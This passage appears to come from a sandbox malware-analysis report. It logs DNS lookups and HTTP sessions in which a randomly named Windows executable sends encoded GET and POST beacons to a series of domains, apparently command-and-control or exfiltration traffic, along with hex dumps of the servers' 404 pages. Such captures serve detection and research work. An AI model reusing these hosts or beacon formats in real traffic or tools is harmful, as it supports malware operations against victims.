Jan 10, 2025 22:49:49.820991993 CET	192.168.2.8	1.1.1.1	0xeff0	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:03.439291954 CET	192.168.2.8	1.1.1.1	0xd1d0	Standard query (0)	www.canadavinreport.site	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:16.899125099 CET	192.168.2.8	1.1.1.1	0x479	Standard query (0)	www.yunlekeji.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:17.895956039 CET	192.168.2.8	1.1.1.1	0x479	Standard query (0)	www.yunlekeji.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:32.306009054 CET	192.168.2.8	1.1.1.1	0xd572	Standard query (0)	www.logidant.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:45.697027922 CET	192.168.2.8	1.1.1.1	0xb831	Standard query (0)	www.laohub10.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:59.931351900 CET	192.168.2.8	1.1.1.1	0xe4d5	Standard query (0)	www.zkdamdjj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 22:49:20.368978977 CET	1.1.1.1	192.168.2.8	0x7786	No error (0)	www.izmirescortg.xyz		172.67.186.192	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:49:20.368978977 CET	1.1.1.1	192.168.2.8	0x7786	No error (0)	www.izmirescortg.xyz		104.21.36.62	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:49:36.173162937 CET	1.1.1.1	192.168.2.8	0x3b22	No error (0)	www.aballanet.cat	aballanet.cat		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:49:36.173162937 CET	1.1.1.1	192.168.2.8	0x3b22	No error (0)	aballanet.cat		134.0.14.158	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:49:50.126955986 CET	1.1.1.1	192.168.2.8	0xeff0	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:03.485141993 CET	1.1.1.1	192.168.2.8	0xd1d0	No error (0)	www.canadavinreport.site		185.27.134.206	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:18.271655083 CET	1.1.1.1	192.168.2.8	0x479	No error (0)	www.yunlekeji.top	www-yunlekeji-top.lo0.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:50:18.271655083 CET	1.1.1.1	192.168.2.8	0x479	No error (0)	www-yunlekeji-top.lo0.faipod.com	fap-a13f5c64.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:50:18.271655083 CET	1.1.1.1	192.168.2.8	0x479	No error (0)	fap-a13f5c64.faipod.com		165.154.96.210	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:18.271675110 CET	1.1.1.1	192.168.2.8	0x479	No error (0)	www.yunlekeji.top	www-yunlekeji-top.lo0.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:50:18.271675110 CET	1.1.1.1	192.168.2.8	0x479	No error (0)	www-yunlekeji-top.lo0.faipod.com	fap-a13f5c64.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:50:18.271675110 CET	1.1.1.1	192.168.2.8	0x479	No error (0)	fap-a13f5c64.faipod.com		165.154.96.210	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:32.321130037 CET	1.1.1.1	192.168.2.8	0xd572	No error (0)	www.logidant.xyz	logidant.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:50:32.321130037 CET	1.1.1.1	192.168.2.8	0xd572	No error (0)	logidant.xyz		45.141.156.114	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:46.272382021 CET	1.1.1.1	192.168.2.8	0xb831	No error (0)	www.laohub10.net	r0lqcud7.nbnnn.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:50:46.272382021 CET	1.1.1.1	192.168.2.8	0xb831	No error (0)	r0lqcud7.nbnnn.xyz		202.79.161.151	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:46.272382021 CET	1.1.1.1	192.168.2.8	0xb831	No error (0)	r0lqcud7.nbnnn.xyz		23.225.159.42	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:46.272382021 CET	1.1.1.1	192.168.2.8	0xb831	No error (0)	r0lqcud7.nbnnn.xyz		23.225.160.132	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:46.272382021 CET	1.1.1.1	192.168.2.8	0xb831	No error (0)	r0lqcud7.nbnnn.xyz		27.124.4.246	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:59.944077015 CET	1.1.1.1	192.168.2.8	0xe4d5	No error (0)	www.zkdamdjj.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:50:59.944077015 CET	1.1.1.1	192.168.2.8	0xe4d5	No error (0)	www.zkdamdjj.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.izmirescortg.xyz

www.aballanet.cat

www.madhf.tech

www.canadavinreport.site

www.yunlekeji.top

www.logidant.xyz

www.laohub10.net

www.zkdamdjj.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	65503	172.67.186.192	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:20.391077042 CET	374	OUT	GET /lnl7/?knE=vl8DPVdxl&2nI=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.izmirescortg.xyz User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 10, 2025 22:49:21.092318058 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 21:49:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ntuec1a6MWIXpw8iimgVhZtdSGxYm7H2n26EBLR%2F9GGsOyPVMga4Gb%2B6NUAaWZcTEf3E2CW5bv1e%2FqCj%2BieRf1TGFyvjvlHAUTKLZfhgQ6It1x%2B8t%2BbvHftg1pNyvnNf03qCEmEZRg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffe05d3ebb0f91-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8815&min_rtt=8815&rtt_var=4407&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=374&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED] Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <d
Jan 10, 2025 22:49:21.092336893 CET	889	IN	Data Raw: 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b Data Ascii: iv style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	65504	134.0.14.158	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:36.211005926 CET	632	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 41 69 62 59 58 4b 50 50 69 6d 58 72 30 44 4f 58 67 33 41 54 44 6f 45 6d 77 52 75 59 30 47 75 6d 38 2b 61 71 47 59 3d Data Ascii: 2nI=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4AibYXKPPimXr0DOXg3ATDoEmwRuY0Gum8+aqGY=
Jan 10, 2025 22:49:37.113358021 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 21:49:36 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 10, 2025 22:49:37.113379002 CET	1236	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
Jan 10, 2025 22:49:37.113390923 CET	1236	IN	Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
Jan 10, 2025 22:49:37.113492012 CET	1236	IN	Data Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
Jan 10, 2025 22:49:37.113497972 CET	724	IN	Data Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
Jan 10, 2025 22:49:37.113516092 CET	1236	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
Jan 10, 2025 22:49:37.113523006 CET	1236	IN	Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
Jan 10, 2025 22:49:37.113626957 CET	448	IN	Data Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
Jan 10, 2025 22:49:37.113634109 CET	1236	IN	Data Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10
Jan 10, 2025 22:49:37.113647938 CET	1236	IN	Data Raw: 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 Data Ascii: 02,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36p
Jan 10, 2025 22:49:37.118628979 CET	1236	IN	Data Raw: 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d Data Ascii: {gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	65505	134.0.14.158	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:38.771270037 CET	652	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 35 35 47 70 7a 63 4f 31 2f 62 48 6d 53 62 65 30 6e 75 4b 57 4a 44 39 36 48 53 55 57 6b 4f 41 62 55 74 47 6f 4e 46 61 5a 79 65 66 62 36 72 6a 68 6f 55 70 70 5a 35 39 34 58 70 33 4b 61 64 2f 32 78 37 39 63 49 2f 54 39 31 39 44 6a 6c 42 47 2f 71 37 6e 59 2f 45 36 76 70 62 4b 5a 46 76 36 69 30 52 69 6b 6e 5a 4f 57 43 4c 54 30 52 79 77 74 2f 6b 6d 59 34 55 34 52 79 55 51 48 71 56 44 54 37 75 75 43 79 6b 4e 43 2f 47 51 44 41 76 6d 7a 35 59 64 44 62 47 38 66 75 71 30 52 4d 72 4b 79 6a 78 77 35 65 64 6a 43 4c 2b 65 2f 74 50 6d 47 39 77 Data Ascii: 2nI=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDAvmz5YdDbG8fuq0RMrKyjxw5edjCL+e/tPmG9w
Jan 10, 2025 22:49:39.585517883 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 21:49:39 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 10, 2025 22:49:39.585594893 CET	1236	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
Jan 10, 2025 22:49:39.585633039 CET	1236	IN	Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
Jan 10, 2025 22:49:39.585666895 CET	1236	IN	Data Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
